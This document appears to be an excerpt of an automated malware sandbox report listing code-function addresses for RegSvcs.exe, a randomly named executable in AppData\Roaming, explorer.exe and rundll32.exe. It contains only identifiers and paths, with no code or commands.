Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4F40	7_2_011B4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BEFA0	7_2_011BEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132FC8	7_2_01132FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140E59	7_2_01140E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152ED9	7_2_01152ED9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112F172	7_2_0112F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0117516C	7_2_0117516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114B1B0	7_2_0114B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011433F3	7_2_011433F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011452A0	7_2_011452A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115D2F0	7_2_0115D2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01143497	7_2_01143497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011874E0	7_2_011874E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114B730	7_2_0114B730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01149950	7_2_01149950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115B950	7_2_0115B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01131979	7_2_01131979
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011459DA	7_2_011459DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AD800	7_2_011AD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011438E0	7_2_011438E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115FB80	7_2_0115FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B5BF0	7_2_011B5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0117DBF9	7_2_0117DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B3A6C	7_2_011B3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01143D40	7_2_01143D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115FDC0	7_2_0115FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B9C32	7_2_011B9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01159C20	7_2_01159C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01141F92	7_2_01141F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01149EB0	7_2_01149EB0
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_051DD5DC	8_2_051DD5DC
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07309668	8_2_07309668
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07309658	8_2_07309658
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07300400	8_2_07300400
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_073003F0	8_2_073003F0
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_073003C8	8_2_073003C8
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07307E60	8_2_07307E60
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07309ED8	8_2_07309ED8
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07309AA0	8_2_07309AA0
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07309A90	8_2_07309A90
Source: C:\Windows\explorer.exe	Code function: 9_2_0E396232	9_2_0E396232
Source: C:\Windows\explorer.exe	Code function: 9_2_0E395036	9_2_0E395036
Source: C:\Windows\explorer.exe	Code function: 9_2_0E38C082	9_2_0E38C082
Source: C:\Windows\explorer.exe	Code function: 9_2_0E390B30	9_2_0E390B30
Source: C:\Windows\explorer.exe	Code function: 9_2_0E390B32	9_2_0E390B32
Source: C:\Windows\explorer.exe	Code function: 9_2_0E393912	9_2_0E393912
Source: C:\Windows\explorer.exe	Code function: 9_2_0E38DD02	9_2_0E38DD02
Source: C:\Windows\explorer.exe	Code function: 9_2_0E3995CD	9_2_0E3995CD
Source: C:\Windows\explorer.exe	Code function: 9_2_104F8036	9_2_104F8036
Source: C:\Windows\explorer.exe	Code function: 9_2_104EF082	9_2_104EF082
Source: C:\Windows\explorer.exe	Code function: 9_2_104F0D02	9_2_104F0D02
Source: C:\Windows\explorer.exe	Code function: 9_2_104F6912	9_2_104F6912
Source: C:\Windows\explorer.exe	Code function: 9_2_104FC5CD	9_2_104FC5CD
Source: C:\Windows\explorer.exe	Code function: 9_2_104F9232	9_2_104F9232
Source: C:\Windows\explorer.exe	Code function: 9_2_104F3B32	9_2_104F3B32
Source: C:\Windows\explorer.exe	Code function: 9_2_104F3B30	9_2_104F3B30
Source: C:\Windows\explorer.exe	Code function: 9_2_1063C036	9_2_1063C036
Source: C:\Windows\explorer.exe	Code function: 9_2_10633082	9_2_10633082
Source: C:\Windows\explorer.exe	Code function: 9_2_10634D02	9_2_10634D02
Source: C:\Windows\explorer.exe	Code function: 9_2_1063A912	9_2_1063A912
Source: C:\Windows\explorer.exe	Code function: 9_2_106405CD	9_2_106405CD
Source: C:\Windows\explorer.exe	Code function: 9_2_1063D232	9_2_1063D232
Source: C:\Windows\explorer.exe	Code function: 9_2_10637B32	9_2_10637B32
Source: C:\Windows\explorer.exe	Code function: 9_2_10637B30	9_2_10637B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00401026	13_2_00401026
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00401030	13_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041EB5E	13_2_0041EB5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041E53C	13_2_0041E53C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00402D89	13_2_00402D89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00402D90	13_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041DDB4	13_2_0041DDB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00409E60	13_2_00409E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041DF38	13_2_0041DF38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041D7FE	13_2_0041D7FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00402FB0	13_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01240100	13_2_01240100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012EA118	13_2_012EA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012D8158	13_2_012D8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013041A2	13_2_013041A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013101AA	13_2_013101AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013081CC	13_2_013081CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012E2000	13_2_012E2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130A352	13_2_0130A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0125E3F0	13_2_0125E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013103E6	13_2_013103E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012F0274	13_2_012F0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012D02C0	13_2_012D02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01250535	13_2_01250535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01310591	13_2_01310591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012F4420	13_2_012F4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01302446	13_2_01302446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012FE4F6	13_2_012FE4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01250770	13_2_01250770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01274750	13_2_01274750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0124C7C0	13_2_0124C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0126C6E0	13_2_0126C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01266962	13_2_01266962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012529A0	13_2_012529A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0131A9A6	13_2_0131A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01252840	13_2_01252840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0125A840	13_2_0125A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012368B8	13_2_012368B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0127E8F0	13_2_0127E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130AB40	13_2_0130AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01306BD7	13_2_01306BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0124EA80	13_2_0124EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0125AD00	13_2_0125AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012ECD1F	13_2_012ECD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01268DBF	13_2_01268DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0124ADE0	13_2_0124ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01250C00	13_2_01250C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012F0CB5	13_2_012F0CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01240CF2	13_2_01240CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01292F28	13_2_01292F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01270F30	13_2_01270F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012F2F30	13_2_012F2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012C4F40	13_2_012C4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012CEFA0	13_2_012CEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0125CFE0	13_2_0125CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01242FC8	13_2_01242FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130EE26	13_2_0130EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01250E59	13_2_01250E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130CE93	13_2_0130CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01262E90	13_2_01262E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130EEDB	13_2_0130EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0128516C	13_2_0128516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0123F172	13_2_0123F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0131B16B	13_2_0131B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0125B1B0	13_2_0125B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130F0E0	13_2_0130F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013070E9	13_2_013070E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012FF0CC	13_2_012FF0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012570C0	13_2_012570C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130132D	13_2_0130132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0123D34C	13_2_0123D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0129739A	13_2_0129739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012552A0	13_2_012552A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012F12ED	13_2_012F12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0126B2C0	13_2_0126B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01307571	13_2_01307571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012ED5B0	13_2_012ED5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013195C3	13_2_013195C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130F43F	13_2_0130F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01241460	13_2_01241460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130F7B0	13_2_0130F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01295630	13_2_01295630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013016CC	13_2_013016CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012E5910	13_2_012E5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01259950	13_2_01259950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0126B950	13_2_0126B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012BD800	13_2_012BD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012538E0	13_2_012538E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130FB76	13_2_0130FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0126FB80	13_2_0126FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0128DBF9	13_2_0128DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012C5BF0	13_2_012C5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012C3A6C	13_2_012C3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01307A46	13_2_01307A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130FA49	13_2_0130FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012EDAAC	13_2_012EDAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01295AA0	13_2_01295AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012F1AA3	13_2_012F1AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012FDAC6	13_2_012FDAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01307D73	13_2_01307D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01253D40	13_2_01253D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01301D5A	13_2_01301D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0126FDC0	13_2_0126FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012C9C32	13_2_012C9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130FCF2	13_2_0130FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130FF09	13_2_0130FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130FFB1	13_2_0130FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01251F92	13_2_01251F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01213FD2	13_2_01213FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01213FD5	13_2_01213FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01259EB0	13_2_01259EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CFE4F6	15_2_04CFE4F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D02446	15_2_04D02446
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CF4420	15_2_04CF4420
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D10591	15_2_04D10591
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C50535	15_2_04C50535
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C6C6E0	15_2_04C6C6E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C4C7C0	15_2_04C4C7C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C74750	15_2_04C74750
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C50770	15_2_04C50770
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CE2000	15_2_04CE2000
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D081CC	15_2_04D081CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D041A2	15_2_04D041A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D101AA	15_2_04D101AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CD8158	15_2_04CD8158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C40100	15_2_04C40100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CEA118	15_2_04CEA118
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CD02C0	15_2_04CD02C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CF0274	15_2_04CF0274
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C5E3F0	15_2_04C5E3F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D103E6	15_2_04D103E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0A352	15_2_04D0A352
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C40CF2	15_2_04C40CF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CF0CB5	15_2_04CF0CB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C50C00	15_2_04C50C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C4ADE0	15_2_04C4ADE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C68DBF	15_2_04C68DBF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C5AD00	15_2_04C5AD00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CECD1F	15_2_04CECD1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0EEDB	15_2_04D0EEDB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0CE93	15_2_04D0CE93
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C62E90	15_2_04C62E90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C50E59	15_2_04C50E59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0EE26	15_2_04D0EE26
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C42FC8	15_2_04C42FC8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C5CFE0	15_2_04C5CFE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CCEFA0	15_2_04CCEFA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CC4F40	15_2_04CC4F40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C92F28	15_2_04C92F28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C70F30	15_2_04C70F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CF2F30	15_2_04CF2F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C7E8F0	15_2_04C7E8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C368B8	15_2_04C368B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C52840	15_2_04C52840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C5A840	15_2_04C5A840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C529A0	15_2_04C529A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D1A9A6	15_2_04D1A9A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C66962	15_2_04C66962
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C4EA80	15_2_04C4EA80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D06BD7	15_2_04D06BD7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0AB40	15_2_04D0AB40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C41460	15_2_04C41460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0F43F	15_2_04D0F43F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D195C3	15_2_04D195C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CED5B0	15_2_04CED5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D07571	15_2_04D07571
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D016CC	15_2_04D016CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C95630	15_2_04C95630
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0F7B0	15_2_04D0F7B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CFF0CC	15_2_04CFF0CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C570C0	15_2_04C570C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0F0E0	15_2_04D0F0E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D070E9	15_2_04D070E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C5B1B0	15_2_04C5B1B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C8516C	15_2_04C8516C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C3F172	15_2_04C3F172
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D1B16B	15_2_04D1B16B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C6B2C0	15_2_04C6B2C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CF12ED	15_2_04CF12ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C552A0	15_2_04C552A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C9739A	15_2_04C9739A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C3D34C	15_2_04C3D34C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0132D	15_2_04D0132D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0FCF2	15_2_04D0FCF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CC9C32	15_2_04CC9C32
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C6FDC0	15_2_04C6FDC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C53D40	15_2_04C53D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D01D5A	15_2_04D01D5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D07D73	15_2_04D07D73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C59EB0	15_2_04C59EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C13FD2	15_2_04C13FD2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C13FD5	15_2_04C13FD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C51F92	15_2_04C51F92
